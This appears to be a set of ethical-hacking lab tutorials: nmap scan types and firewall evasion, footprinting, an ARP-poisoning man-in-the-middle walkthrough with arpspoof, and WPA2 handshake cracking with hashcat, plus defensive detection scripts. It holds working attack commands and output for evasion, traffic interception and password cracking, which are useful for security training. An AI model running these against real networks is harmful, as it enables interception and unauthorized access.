Nmap scan report for 192.168.100.11
Host is up (0.0019s latency).
All 1000 scanned ports on 192.168.100.11 are closed

Nmap done: 1 IP address (1 host up) scanned in 6.29 seconds

The -sN switch scans the target with a NULL scan; the scan sends a packet without any flags set. If the NULL packet is sent to an open port there will be no response. If it is sent to a closed port, the target responds with an RST packet. This type of scan is easy to detect because there is no legitimate reason to send a TCP packet without any flags.

When using the NULL scan the target responds similarly to the FIN and Xmas scans.

The -sA switch sends a packet with the ACK flag set when scanning a host. When the target receives the ACK packet it replies with an RST packet. If the firewall is enabled, the firewall blocks the target host's response and there will be no response back.

Observe the output in nmap when the firewall is enabled.

nmap -sA 192.168.100.11

Starting Nmap 7.70 ( https://nmap.org ) at 2019-05-30 19:36 W. Europe Daylight Time
Nmap scan report for 192.168.100.11
Host is up (0.0010s latency).
All 1000 scanned ports on 192.168.100.11 are filtered

Nmap done: 1 IP address (1 host up) scanned in 27.58 seconds

If the firewall is enabled, the line "All 1000 scanned ports on 192.168.100.11 are filtered" comes back with the "filtered" value. The "filtered" response shows that a firewall is enabled on the system.

Running the same command against a target with the firewall disabled, the output has a different value.

nmap -sA 192.168.100.11

Starting Nmap 7.70 ( https://nmap.org ) at 2019-05-30 19:39 W. Europe Daylight Time
Nmap scan report for 192.168.100.11
Host is up (0.0013s latency).
All 1000 scanned ports on 192.168.100.11 are unfiltered

Nmap done: 1 IP address (1 host up) scanned in 7.23 seconds

The "All 1000 scanned ports on 192.168.100.11 are unfiltered" line now comes back with the "unfiltered" value, which means there is no firewall enabled on the target.
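To tie the scan types above together from the defender's side, the following added example (not nmap's code and not part of this guide) encodes the probe/reply behaviour the text describes for SYN, ACK, FIN, NULL and Xmas probes and the state nmap reports for each, and then uses the same flag signatures as a simple scan detector over constructed, tcpdump-style log lines; the log format, hosts and threshold are assumptions for the example.

```python
"""Flag-based TCP probe classification and the port states Nmap reports."""
from __future__ import annotations
import re
from collections import defaultdict

# Flag sets that identify the probe types discussed above (letters as in
# the scan names; ACK is written A here, tcpdump itself prints it as '.').
PROBE_BY_FLAGS = {
    frozenset("S"): "SYN",      # -sS / -sT both start with a bare SYN
    frozenset("A"): "ACK",      # -sA
    frozenset("F"): "FIN",      # -sF
    frozenset(): "NULL",        # -sN, no flags at all
    frozenset("FPU"): "XMAS",   # -sX: FIN+PSH+URG
}


def target_reply(probe: str, port_open: bool, firewalled: bool) -> str | None:
    """What the target sends back (None = silence). A filtering firewall
    drops the probe; otherwise RFC 793 behaviour applies."""
    if firewalled:
        return None
    if probe == "SYN":
        return "SYN/ACK" if port_open else "RST/ACK"
    if probe == "ACK":
        return "RST"                    # any unfiltered port answers an ACK with RST
    return None if port_open else "RST"  # FIN/NULL/Xmas: only closed ports answer


def nmap_state(probe: str, reply: str | None) -> str:
    """The state Nmap prints for a probe/reply pair (matches the outputs above)."""
    if probe == "SYN":
        return {"SYN/ACK": "open", "RST/ACK": "closed"}.get(reply, "filtered")
    if probe == "ACK":
        return "unfiltered" if reply == "RST" else "filtered"
    return "closed" if reply == "RST" else "open|filtered"


# Constructed tcpdump-style records: "IP src.port > dst.port: Flags [..]"
LOG_RE = re.compile(r"IP (\S+)\.(\d+) > (\S+)\.(\d+): Flags \[([SAFRPU]*)\]")


def classify_line(line: str) -> tuple[str, str, int, str] | None:
    """Return (src, dst, dst_port, probe), or None when the line is not one of
    the probe signatures (normal traffic such as [PA] is ignored)."""
    m = LOG_RE.match(line)
    if not m:
        return None
    src, _sport, dst, dport, flags = m.groups()
    probe = PROBE_BY_FLAGS.get(frozenset(flags))
    if probe is None:
        return None
    return src, dst, int(dport), probe


def detect_scans(lines, min_ports: int = 5) -> dict[tuple[str, str, str], int]:
    """Count distinct destination ports per (src, dst, probe type). One SYN to
    one port is a normal connection; the same flag pattern against many ports
    of one host is the signature of a port scan. Returns the tuples that
    reached min_ports with their port counts."""
    ports: dict[tuple[str, str, str], set[int]] = defaultdict(set)
    for line in lines:
        hit = classify_line(line)
        if hit:
            src, dst, dport, probe = hit
            ports[(src, dst, probe)].add(dport)
    return {key: len(p) for key, p in ports.items() if len(p) >= min_ports}


SAMPLE_LOG = [
    # a normal HTTPS session from .50: one SYN, then data, not a scan
    "IP 192.168.100.50.51000 > 192.168.100.11.443: Flags [S]",
    "IP 192.168.100.50.51000 > 192.168.100.11.443: Flags [PA]",
    # an Xmas sweep from .99 over six ports
    *[f"IP 192.168.100.99.{40000 + p} > 192.168.100.11.{p}: Flags [FPU]"
      for p in (21, 22, 25, 53, 80, 443)],
    # three NULL probes from .99: below the threshold on its own
    *[f"IP 192.168.100.99.{40000 + p} > 192.168.100.11.{p}: Flags []"
      for p in (135, 139, 445)],
]

if __name__ == "__main__":
    for probe in PROBE_BY_FLAGS.values():
        for port_open, fw in ((True, False), (False, False), (True, True)):
            reply = target_reply(probe, port_open, fw)
            print(f"{probe:5} open={port_open!s:5} firewall={fw!s:5} "
                  f"-> {reply or 'no reply':8} {nmap_state(probe, reply)}")
    print(detect_scans(SAMPLE_LOG))
```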

Firewall Evasion

Description             Command
Idle zombie scan        nmap -sI [zombie] [target]
Use a decoy             nmap -D RND:[number] [target]
Fragment packets        nmap -f [target]
Specify MTU             nmap --mtu [MTU] [target]
Randomize scan order    nmap --randomize-hosts [target]
Send bad checksums      nmap --badsum [target]
Specify source port     nmap --source-port [port] [target]
Spoof MAC address       nmap --spoof-mac [MAC|0|vendor] [target]

The -sI switch is called an idle scan or zombie scan and is a stealth technique: packets received on the scanned host can't be traced back to the sender, because all network traffic to the target host goes through a second host on the network called the "zombie".

For a more detailed explanation of how the idle scan works I recommend reading the official nmap documentation at https://nmap.org/book/idlescan.html

The -f switch is used to fragment probes into 8-byte packets; the scan splits the TCP header over several packets. It is an effective way to hide the scan and make it harder for intrusion detection systems to detect it.

The -D switch is used to hide port scans by using one or more decoy IP addresses; the network traffic on the scanned host will appear to come from the decoy IP addresses.

The --source-port switch is used to manually specify the source port number of a probe.

The --randomize-hosts switch is used to randomize the scanning order of the specified ping sweep or range scan.

Script Engines

Description                       Command
Run script                        nmap --script [script.nse] [target]
Run scripts                       nmap --script [expression] [target]
Run scripts by category           nmap --script [cat] [target]
Run multiple script categories    nmap --script [cat1,cat2,cat3] [target]
Update script database            nmap --script-updatedb

Script categories: all, discovery, default, auth, external, malware, vuln, intrusive, safe

Useful scans

Find Information about IP address

nmap --script=asn-query,whois,ip-geolocation-maxmind [target]

Detect the Heartbleed SSL vulnerability

nmap -sV -p 443 --script=ssl-heartbleed [target]

Scan for DDoS reflection UDP services

nmap -sU -A -Pn -n -pU:19,53,123,161 --script=ntp-monlist,dns-recursion,snmp-sysdescr [target]

Scan HTTP Service

Get page titles

nmap --script=http-title [target]

Get HTTP headers

nmap --script=http-headers [target]

Recommended sites

https://highon.coffee/blog/nmap-cheat-sheet/

Conclusion

We have looked into some of the scanning techniques we can use with nmap.

Check out the Ethical Hacking notes for more Kali Linux quick guides.




Footprinting and Reconnaissance

Footprinting and Reconnaissance

Footprinting is the process of using various tools and techniques to understand and learn the target's infrastructure and vulnerabilities.

In the initial phase we want to find out as much as possible by gathering information that is publicly available, without actually interacting with the target. This kind of reconnaissance can be passive or pseudonymous.

Here are some of the kinds of information you can gather about a target during footprinting.

  • Websites
  • Alternative Websites
  • Domain names
  • Network blocks
  • Specific IP addresses
  • Network services and applications
  • System architecture
  • Authentication mechanisms
  • Access control mechanisms
  • Employee email & Phone numbers
  • Contact addresses

In this lab we will use tools like ping, tracert and search engines to obtain information about our target.

Let's start with the basic ping command. In this lab series I will use www.hackthissite.org to try out my attacks.

“Hack This Site is a free training ground for users to test and expand their hacking skills. Our community is dedicated to facilitating an open learning environment by providing a series of hacking challenges, articles, resources, and discussion of the latest happenings in hacker culture. We are an online movement of artists, activists, hackers and anarchists who are organizing to create new worlds.”

Open CMD and ping your favourite site; I am pinging www.hackthissite.org.

C:\>ping www.hackthissite.org

Pinging www.hackthissite.org [137.74.187.102] with 32 bytes of data:
Reply from 137.74.187.102: bytes=32 time=40ms TTL=45
Reply from 137.74.187.102: bytes=32 time=40ms TTL=45
Reply from 137.74.187.102: bytes=32 time=40ms TTL=45
Reply from 137.74.187.102: bytes=32 time=40ms TTL=45

Ping statistics for 137.74.187.102:
    Packets: Sent = 4, Received = 4, Lost = 0 (0% loss),
Approximate round trip times in milli-seconds:
    Minimum = 40ms, Maximum = 40ms, Average = 40ms

C:\>

We can see that the site replied with its IP address which is 137.74.187.102.

Now that we have the IP address we can use tracert to see the path the traffic takes from your client to www.hackthissite.org.

C:\>tracert 137.74.187.102

Tracing route to hackthissite.org [137.74.187.102]
over a maximum of 30 hops:

  1    <1 ms    <1 ms    <1 ms  192.168.10.1
  2     1 ms     1 ms     1 ms  h85-209-118-1.cust.a3fiber.se [85.209.118.1]
  3     1 ms     1 ms     1 ms  gsl-bbr-1-be102.net.comhem.se [213.200.167.80]
  4     4 ms     9 ms     6 ms  gbg1.dr2.a3network.se [88.129.174.24]
  5     1 ms     1 ms     1 ms  gbg1.a3network.se [88.129.128.62]
  6     1 ms     1 ms     1 ms  gbg1.cr1.a3network.se [85.8.9.16]
  7     7 ms     7 ms     7 ms  sto2.cr1.a3network.se [85.8.10.20]
  8    29 ms    18 ms    18 ms  s-b10-link.telia.net [213.248.93.188]
  9    18 ms    17 ms    19 ms  s-bb4-link.telia.net [62.115.119.80]
 10    33 ms    33 ms    33 ms  ffm-bb4-link.telia.net [62.115.138.105]
 11    34 ms    51 ms    30 ms  ffm-b1-link.telia.net [62.115.137.169]
 12    39 ms    39 ms    39 ms  be100-163.fra-5-a9.de.eu [178.33.100.250]
 13   222 ms    44 ms    45 ms  be103.rbx-g2-nc5.fr.eu [94.23.122.240]
 14     *        *        *     Request timed out.
 15     *       40 ms     *     vl7.vss-10b-6k.fr.eu [178.33.100.218]
 16    40 ms    40 ms    40 ms  hackthissite.org [137.74.187.102]

Trace complete.

C:\>

With the tracert command we can follow the traffic through all routers and firewalls until we arrive at the website.

Use www.netcraft.com To Obtain More Data

Open www.netcraft.com in your web browser. In the right menu under "What's that site running?" enter www.hackthissite.org and the result page will open. Here we can see all the subdomains the site has.

On the result page click on the site report next to the domain name; a new page will load with information like email addresses, physical addresses, OS versions, web server version and a lot more.

Use WHOIS to obtain domain name information

WHOIS is a database that has information about domains and about the people who own them. Using this tool gives you the potential to gather personal information about people that you can later use when doing social engineering, as well as collecting information such as:

  • Information about the owner
  • Contact information
  • Location
  • Domain name servers
  • The IP address
  • The creation date

There are several ways to use WHOIS: online services, applications and the command line; use the method you are comfortable with. If you are using a Windows client then you need to download WHOIS; there is no need to install anything if you are using Kali Linux.

In this example we will show you how to use WHOIS from the Windows command line. Download WHOIS from Microsoft at https://docs.microsoft.com/en-us/sysinternals/downloads/whois and extract the files to the root of the C:\ drive.

Open CMD and type whois [-v] domainname [whois.server]

C:\>whois -v hackthissite.org

Whois v1.20 - Domain information lookup
Copyright (C) 2005-2017 Mark Russinovich
Sysinternals - www.sysinternals.com

Connecting to ORG.whois-servers.net...
Server ORG.whois-servers.net returned the following for HACKTHISSITE.ORG

Domain Name: HACKTHISSITE.ORG
Registry Domain ID: D99641092-LROR
Registrar WHOIS Server: whois.enom.com
Registrar URL: http://www.enom.com
Updated Date: 2019-01-14T03:31:05Z
Creation Date: 2003-08-10T15:01:25Z
Registry Expiry Date: 2019-08-10T15:01:25Z
Registrar Registration Expiration Date:
Registrar: eNom, Inc.
Registrar IANA ID: 48
Registrar Abuse Contact Email: abuse@enom.com
Registrar Abuse Contact Phone: +1.4252982646
Reseller:
Domain Status: clientTransferProhibited https://icann.org/epp#clientTransferProhibited
Registrant Organization: Whois Privacy Protection Service, Inc.
Registrant State/Province: WA
Registrant Country: US
Name Server: C.NS.BUDDYNS.COM
Name Server: F.NS.BUDDYNS.COM
Name Server: G.NS.BUDDYNS.COM
Name Server: H.NS.BUDDYNS.COM
Name Server: J.NS.BUDDYNS.COM
DNSSEC: unsigned
URL of the ICANN Whois Inaccuracy Complaint Form https://www.icann.org/wicf/)
>>> Last update of WHOIS database: 2019-02-09T22:32:34Z <<<

For more information on Whois status codes, please visit https://icann.org/epp

Use internet archives to get old versions of websites

“The Internet Archive, a 501(c)(3) non-profit, is building a digital library of Internet sites and other cultural artifacts in digital form. Like a paper library, we provide free access to researchers, historians, scholars, the print disabled, and the general public”

Use internet archives like the Wayback Machine to get old versions of sites and check whether you can find vulnerabilities or extract other useful information from old versions of the site.

Use Google Hacking

Google hacking is an information gathering technique that uses Google search queries to identify vulnerabilities in web applications, gather information on individual targets, discover errors, disclose sensitive data, and discover credentials and other sensitive information. For more information on Google hacking queries please search https://www.exploit-db.com

The cache operator finds the recent cache value of a website.

cache:www.hackthissite.org

The link operator lists pages linking to a specific domain or URL.

link:www.hackthissite.org

The info operator displays information about a page.

info:www.hackthissite.org

The site operator restricts the search to a specific site.

site:www.hackthissite.org

The allinurl operator only returns pages with the specified keywords in the URL.

allinurl:network camera

The allintitle operator returns pages with the specified keywords in the title.

allintitle:online-it.nu

Website gathering tools

There are many tools you can use to extract and gather information from the target's websites. Below are some examples of browser plugins and applications that you can use.

  • Web Data Extractor 8.3
  • Firebug plugin for Chrome
  • HTTrack Website Copier for Windows

Gathering information from DNS

If the target has some kind of public-facing server then they will have some kind of DNS server; we can use DNS to gather information about email servers and other servers that the target is utilizing by analysing the record types on the DNS server. See a list of DNS record types.

There are many tools, online and offline, that you can use to gather information about DNS. In this example we are using nslookup: open the command line in Windows or a shell in Linux and type nslookup followed by the FQDN or the IP address of the target.

Below are some examples of DNS queries.

# Check DNS A record
C:\>nslookup
Default Server:  8.8.8.8
Address:  8.8.8.8

> set type=a
> www.google.se
Server:  8.8.8.8
Address:  8.8.8.8

Non-authoritative answer:
Name:    www.google.se
Address:  216.58.207.227

# Check DNS mx record
C:\>nslookup
Default Server:  8.8.8.8
Address:  8.8.8.8

> set type=mx
> live.se
Server:  8.8.8.8
Address:  8.8.8.8

Non-authoritative answer:
live.se MX preference = 10, mail exchanger = eur.olc.protection.outlook.com

eur.olc.protection.outlook.com  internet address = 104.47.126.33
eur.olc.protection.outlook.com  internet address = 104.47.124.33

We have looked at the basic tools you can utilize when footprinting a target, and at how to find information about a target without interacting with the target.

There are a lot of tools you can use during the footprinting phase; as always Google is your best friend, there is tons of information out there.

Check out the Ethical Hacking notes for more Kali Linux quick guides.




How To Setup A Man In The Middle Attack Using ARP Poisoning

A Man In The Middle Attack (MITM) enables the attacker to eavesdrop on and alter the communication between two parties. The attacker is able to redirect the flow of packets from any client on the network to his own client. That means that any packet sent to or from the victim will go through the attacker's client.

In this lab we will show you how to set up a man in the middle attack (MITM) using ARP poisoning. The ARP poisoning attack allows us to intercept communications across a network; this lets us sniff any traffic going from the target machine to the internet or to a server on the intranet. Any unencrypted communication will be readable to us.

ARP poisoning takes advantage of the ARP protocol function that lets any device send ARP reply packets to other devices on the same subnet and force them to update their ARP cache tables with new values. The attack tricks the target into thinking it is communicating with the router, while in reality all communication goes through the attacker.

We will use arpspoof, a utility in Kali Linux that allows us to send a stream of unrequested ARP replies to a target machine, telling it that the MAC address of the router has changed to our MAC address. We will use Wireshark to sniff the network traffic coming from our target client.

DISCLAIMER: This software/tutorial is for educational purposes only. It should not be used for illegal activity. The author is not responsible for its use or the users action.

Preparation For The Lab

It is recommended that you have some understanding of how ARP works and how clients communicate at layer 2 of the OSI model before you do the exercise.

For this exercise we want two client machines running on VirtualBox or VMware Workstation Player. We are setting up an attacker client running Kali Linux and a target client running Windows 7; both clients have IP addresses on the same LAN.

Client     IP Address          Gateway
Attacker   172.168.10.60/24    172.168.10.2
Target     172.168.10.70/24    172.168.10.2

Start The ARP Poisoning Attack

First we need to enable IP forwarding on the Kali Linux (attacker) client. Open a terminal and enable IP forwarding (the redirect is done by tee so that it also works when the shell is not running as root).

echo 1 | sudo tee /proc/sys/net/ipv4/ip_forward

Next we want to get our default gateway, the IP address of the router.

sudo ip route

root@GalaxyS9:~# sudo ip route
default via 172.168.10.2 dev eth0 proto static metric 100
172.168.10.0/24 dev eth0 proto kernel scope link src 172.168.10.60 metric 100
root@GalaxyS9:~#

The default gateway for my lab router is 172.168.10.2

Next we need to know the name of the interface we want to perform the attack on. We will use the wired connection eth0. Display the connected network interfaces with "ifconfig".

root@GalaxyS9:~# ifconfig
eth0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST>  mtu 1500
        inet 172.168.10.60  netmask 255.255.255.0  broadcast 172.168.10.255
        inet6 fe80::20c:29ff:fed0:e17a  prefixlen 64  scopeid 0x20<link>
        ether 00:0c:29:d0:e1:7a  txqueuelen 1000  (Ethernet)
        RX packets 512418  bytes 723638885 (690.1 MiB)
        RX errors 0  dropped 276  overruns 0  frame 0
        TX packets 214518  bytes 14530991 (13.8 MiB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0

lo: flags=73<UP,LOOPBACK,RUNNING>  mtu 65536
        inet 127.0.0.1  netmask 255.0.0.0
        inet6 ::1  prefixlen 128  scopeid 0x10<host>
        loop  txqueuelen 1000  (Local Loopback)
        RX packets 254  bytes 25816 (25.2 KiB)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 254  bytes 25816 (25.2 KiB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0

wlan0: flags=4099<UP,BROADCAST,MULTICAST>  mtu 1500
        ether 3e:9d:73:0e:ef:85  txqueuelen 1000  (Ethernet)
        RX packets 0  bytes 0 (0.0 B)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 0  bytes 0 (0.0 B)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0

root@GalaxyS9:~#

Now we can start our attack with arpspoof. Type arpspoof -h to display the help menu.

sudo arpspoof -i [Network Interface] -t [Target] -r [Default Gateway] 

sudo arpspoof -i eth0 -t 172.168.10.70 -r 172.168.10.2

The arpspoof utility will now keep sending unrequested ARP replies to the target, telling it that the address of the router has changed to our address.

root@GalaxyS9:~# sudo arpspoof -i eth0 -t 172.168.10.70 -r 172.168.10.2
0:c:29:d0:e1:7a 0:c:29:df:35:24 0806 42: arp reply 172.168.10.2 is-at 0:c:29:d0:e1:7a
0:c:29:d0:e1:7a 0:50:56:e4:40:82 0806 42: arp reply 172.168.10.70 is-at 0:c:29:d0:e1:7a
0:c:29:d0:e1:7a 0:c:29:df:35:24 0806 42: arp reply 172.168.10.2 is-at 0:c:29:d0:e1:7a
0:c:29:d0:e1:7a 0:50:56:e4:40:82 0806 42: arp reply 172.168.10.70 is-at 0:c:29:d0:e1:7a
0:c:29:d0:e1:7a 0:c:29:df:35:24 0806 42: arp reply 172.168.10.2 is-at 0:c:29:d0:e1:7a
0:c:29:d0:e1:7a 0:50:56:e4:40:82 0806 42: arp reply 172.168.10.70 is-at 0:c:29:d0:e1:7a
0:c:29:d0:e1:7a 0:c:29:df:35:24 0806 42: arp reply 172.168.10.2 is-at 0:c:29:d0:e1:7a
0:c:29:d0:e1:7a 0:50:56:e4:40:82 0806 42: arp reply 172.168.10.70 is-at 0:c:29:d0:e1:7a
0:c:29:d0:e1:7a 0:c:29:df:35:24 0806 42: arp reply 172.168.10.2 is-at 0:c:29:d0:e1:7a
0:c:29:d0:e1:7a 0:50:56:e4:40:82 0806 42: arp reply 172.168.10.70 is-at 0:c:29:d0:e1:7a
0:c:29:d0:e1:7a 0:c:29:df:35:24 0806 42: arp reply 172.168.10.2 is-at 0:c:29:d0:e1:7a
0:c:29:d0:e1:7a 0:50:56:e4:40:82 0806 42: arp reply 172.168.10.70 is-at 0:c:29:d0:e1:7a

The forged ARP replies must be sent continuously for as long as the attack is running: if they stop, the target's ARP cache will eventually be refreshed with the real MAC address of the default gateway.
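As an added example (not part of the original guide), the following Python script parses the tcpdump-style ARP reply lines shown above and applies the two checks an ARP-inspection IDS would use to flag this traffic: a binding that contradicts a known IP-to-MAC baseline, and one MAC claiming several IPs. The baseline MACs are an assumption inferred from the destination addresses in the trace.

```python
from __future__ import annotations
import re
from collections import defaultdict

# Constructed sample: three of the tcpdump-style lines arpspoof printed above
# (src_mac dst_mac ethertype length: arp reply <ip> is-at <mac>).
SAMPLE_TRACE = """\
0:c:29:d0:e1:7a 0:c:29:df:35:24 0806 42: arp reply 172.168.10.2 is-at 0:c:29:d0:e1:7a
0:c:29:d0:e1:7a 0:50:56:e4:40:82 0806 42: arp reply 172.168.10.70 is-at 0:c:29:d0:e1:7a
0:c:29:d0:e1:7a 0:c:29:df:35:24 0806 42: arp reply 172.168.10.2 is-at 0:c:29:d0:e1:7a
"""

# Assumed baseline of legitimate IP -> MAC bindings, inferred from the destination
# MACs of the two-way spoof in the trace above; treat these values as an assumption.
BASELINE = {
    "172.168.10.2": "00:50:56:e4:40:82",   # default gateway
    "172.168.10.70": "00:0c:29:df:35:24",  # target host
}

ARP_REPLY = re.compile(r"^(?P<src>[0-9a-f:]+) (?P<dst>[0-9a-f:]+) 0806 \d+: "
                       r"arp reply (?P<ip>[\d.]+) is-at (?P<mac>[0-9a-f:]+)$")

def norm_mac(mac: str) -> str:
    """Zero-pad each octet: '0:c:29:d0:e1:7a' -> '00:0c:29:d0:e1:7a'."""
    return ":".join(octet.zfill(2) for octet in mac.lower().split(":"))

def parse_arp_replies(text: str) -> list[dict]:
    """Extract sender, receiver and the advertised (ip, mac) binding per reply line."""
    replies = []
    for line in text.splitlines():
        m = ARP_REPLY.match(line.strip())
        if m:
            replies.append({"src": norm_mac(m["src"]), "dst": norm_mac(m["dst"]),
                            "ip": m["ip"], "mac": norm_mac(m["mac"])})
    return replies

def detect_arp_spoof(replies: list[dict], baseline: dict[str, str]) -> dict:
    """Check 1: a reply binds a known IP to a MAC other than the baseline one.
    Check 2: one MAC claims more than one IP (what the -r two-way spoof does)."""
    conflicts = set()
    ips_by_mac = defaultdict(set)
    for r in replies:
        ips_by_mac[r["mac"]].add(r["ip"])
        expected = baseline.get(r["ip"])
        if expected and expected != r["mac"]:
            conflicts.add((r["ip"], expected, r["mac"]))
    multi = {mac: ips for mac, ips in ips_by_mac.items() if len(ips) > 1}
    return {"baseline_conflicts": conflicts, "multi_ip_macs": multi}
```

Both checks fire on the sample: the attacker's MAC (the eth0 address in the ifconfig output above) claims both the gateway and the target, and each claim contradicts the baseline.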

Now open Wireshark on the Kali Linux client and start sniffing on eth0.

Next, open a web browser on the target machine and open your favorite home page; in this example I will open www.facebook.com. Go back to the Kali Linux client and stop the trace. Analyzing the trace will show that the target opened www.facebook.com in its browser.

Conclusion

Always use sites that have SSL/TLS (HTTPS) encryption and never send sensitive information over public WiFi. Intrusion detection and intrusion prevention systems are the sysadmin's best weapon, together with enterprise-grade hardware on the network.

Check out the Ethical Hacking notes for more Kali Linux quick guides.

DISCLAIMER: This software/tutorial is for educational purposes only. It should not be used for illegal activity. The author is not responsible for its use or the users action.




How To Crack WPA/WPA2 Hash Using HashCat

How To Crack WPA/WPA2 With HashCat

This tutorial will illustrate how to install and configure HashCat on a Windows client and crack the captured PMKID or .hccapx files using a wordlist dictionary attack.

“Hashcat is the self-proclaimed world’s fastest password recovery tool. It had a proprietary code base until 2015, but is now released as free software. Versions are available for Linux, OS X, and Windows and can come in CPU-based or GPU-based variants.”

The WPA2 handshake can be captured on a Linux-compatible client such as Kali Linux with a supported WiFi card running in VirtualBox, converted to the right format depending on the capture method, and then moved over to the Windows client to be cracked.

Use the guides Capturing WPA2 and Capturing WPA2 PMKID to capture the WPA2 handshake. For this test we will use the famous “Rockyou” wordlist.

DISCLAIMER: This software/tutorial is for educational purposes only. It should not be used for illegal activity. The author is not responsible for its use or the users action.

Step 1: Download HashCat

Hashcat does not require any installation; it is a portable program, so you only need to unpack the downloaded archive.

  1. First you need to download Hashcat binaries from https://hashcat.net/hashcat/
  2. Navigate to the location where you saved the downloaded file, and unzip the file

Step 2: Download Wordlist

There are numerous wordlists out on the web; for this test we are going to use the famous “rockyou”.

  1. Open the hashcat folder on your hard drive and create a new folder called “wordlist”
  2. Download the rockyou.txt wordlist from this Link.
  3. Save the downloaded file in the new folder “wordlist”

Step 3: Prepare Your Captured WPA2 Handshake

Depending on the method you used to capture the handshake, you must either convert the .cap file to the hashcat 2500 hash-mode format or the PMKID file to the hashcat 16800 hash-mode format.

For how to format the files please see the guides Capturing WPA2 and Capturing WPA2 PMKID.

In this lab we are using a captured PMKID and a pcap handshake, both converted to a hashcat-readable format: “HonnyP01.hccapx” and “HonnyP02.16800”.

I’m using two different home routers from D-Link and Technicolor for this experiment; both WiFi routers are owned by me.

  • The “HonnyP01.hccapx” file is captured from the D-Link router.
  • The “HonnyP02.16800” file is captured from the Technicolor router.

Step 4: Start Hashcat

You need to run hashcat in CMD or PowerShell. In this example we will use CMD to execute our commands and crack the handshake.

Open CMD and navigate to the hashcat folder.

C:\>cd hashcat-5.1.0
C:\hashcat-5.1.0>

Type hashcat64 -h to display all options

C:\hashcat-5.1.0>hashcat64 -h

 ===+=============
  1 | CPU
  2 | GPU
  3 | FPGA, DSP, Co-Processor

- [ Workload Profiles ] -

  # | Performance | Runtime | Power Consumption | Desktop Impact
 ===+=============+=========+===================+=================
  1 | Low         |   2 ms  | Low               | Minimal
  2 | Default     |  12 ms  | Economic          | Noticeable
  3 | High        |  96 ms  | High              | Unresponsive
  4 | Nightmare   | 480 ms  | Insane            | Headless

- [ Basic Examples ] -

  Attack-          | Hash- |
  Mode             | Type  | Example command
 ==================+=======+==================================================================
  Wordlist         | $P$   | hashcat -a 0 -m 400 example400.hash example.dict
  Wordlist + Rules | MD5   | hashcat -a 0 -m 0 example0.hash example.dict -r rules/best64.rule
  Brute-Force      | MD5   | hashcat -a 3 -m 0 example0.hash ?a?a?a?a?a?a
  Combinator       | MD5   | hashcat -a 1 -m 0 example0.hash example.dict example.dict

If you still have no idea what just happened, try the following pages:

* https://hashcat.net/wiki/#howtos_videos_papers_articles_etc_in_the_wild
* https://hashcat.net/faq/

C:\hashcat-5.1.0>

Step 5: Crack WPA2

In the first example we will illustrate how to recover the password from a converted pcap file (“.hccapx”).

Copy your converted file to the hashcat folder; in this example I am copying the file HonnyP01.hccapx to my hashcat folder.

Next we will start hashcat and use the wordlist rockyou, type in the parameters below in CMD.

C:\hashcat-5.1.0>hashcat64 -m 2500 -w3 HonnyP01.hccapx "wordlist\rockyou.txt"

  • hashcat64 the binary
  • -m 2500 the format type
  • -w 3 workload-profile 3
  • HonnyP01.hccapx the formatted file
  • “wordlist\rockyou.txt” the path to the wordlist

Hashcat will start processing the file; if a wordlist entry matches, the terminal will display the hash together with the recovered password.

Watchdog: Temperature abort trigger set to 90c

Dictionary cache hit:
* Filename..: wordlist\rockyou.txt
* Passwords.: 14344384
* Bytes.....: 139921497
* Keyspace..: 14344384

7005312a9933d3a57065450f0749f210:84c9b26a9e90:f4bf80c7ec46:HonnyP01:password
2fed89e93e2cd63175f435db16ca75f0:84c9b26a9e90:f4bf80c7ec46:HonnyP01:password

Here we can see that hashcat was able to match the hash to a password in the wordlist; in this lab the password to the D-Link WiFi is “password”. You can choose to let the application run through the whole wordlist or press “q” to quit.

Approaching final keyspace - workload adjusted.


Session..........: hashcat
Status...........: Cracked
Hash.Type........: WPA-EAPOL-PBKDF2
Hash.Target......: HonnyP01.hccapx
Time.Started.....: Fri Jan 18 20:13:27 2019 (42 secs)
Time.Estimated...: Fri Jan 18 20:14:09 2019 (0 secs)
Guess.Base.......: File (wordlist\rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........:   230.7 kH/s (46.06ms) @ Accel:512 Loops:128 Thr:64 Vec:1
Recovered........: 18/25 (72.00%) Digests, 0/1 (0.00%) Salts
Progress.........: 14344384/14344384 (100.00%)
Rejected.........: 4734913/14344384 (33.01%)
Restore.Point....: 14344384/14344384 (100.00%)
Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:24-49
Candidates.#1....: $HEX[303531313037353434] -> $HEX[042a0337c2a156616d6f732103]
Hardware.Mon.#1..: Temp: 66c Fan: 44% Util: 97% Core:1949MHz Mem:4006MHz Bus:16

Started: Fri Jan 18 20:13:12 2019
Stopped: Fri Jan 18 20:14:10 2019

C:\hashcat-5.1.0>

You can display the cracked password with the --show option or by running the same command again; all cracked hashes are stored in the “hashcat.potfile” in the hashcat folder.

To display the cracked password in CMD, type the command below.

C:\hashcat-5.1.0>hashcat64 -m 2500 -w3 HonnyP01.hccapx "wordlist\rockyou.txt" --show

C:\hashcat-5.1.0>hashcat64 -m 2500 -w3 HonnyP01.hccapx "wordlist\rockyou.txt" --show
7005312a9933d3a57065450f0749f210:84c9b26a9e90:f4bf80c7ec46:HonnyP01:password
2fed89e93e2cd63175f435db16ca75f0:84c9b26a9e90:f4bf80c7ec46:HonnyP01:password
fcaf4223879e125e10a272f9234256fe:84c9b26a9e90:f4bf80c7ec46:HonnyP01:password
7617ef601966436708eae3ad2c02d295:84c9b26a9e90:f4bf80c7ec46:HonnyP01:password
8b5ddfc6bade402e38e2ce023449bf07:84c9b26a9e90:f4bf80c7ec46:HonnyP01:password
C:\hashcat-5.1.0>

In the next example we will run the same command, except that we now use the 16800 mode to run the dictionary attack against the formatted PMKID file captured from the Technicolor router.

C:\hashcat-5.1.0>hashcat64 -m 16800 -w 3 HonnyP02.16800 "wordlist\rockyou.txt"

  • hashcat64 the binary
  • -m 16800 the format type
  • -w 3 workload-profile 3
  • HonnyP02.16800 the formatted file
  • “wordlist\rockyou.txt” the path to the wordlist

17a40e5b92e3815f6111554b1c80f4d9*c4ea1d1f7d93*c498808d7d5f*4c656f6e20322e342047487a:adsladsl

Session..........: hashcat
Status...........: Cracked
Hash.Type........: WPA-PMKID-PBKDF2
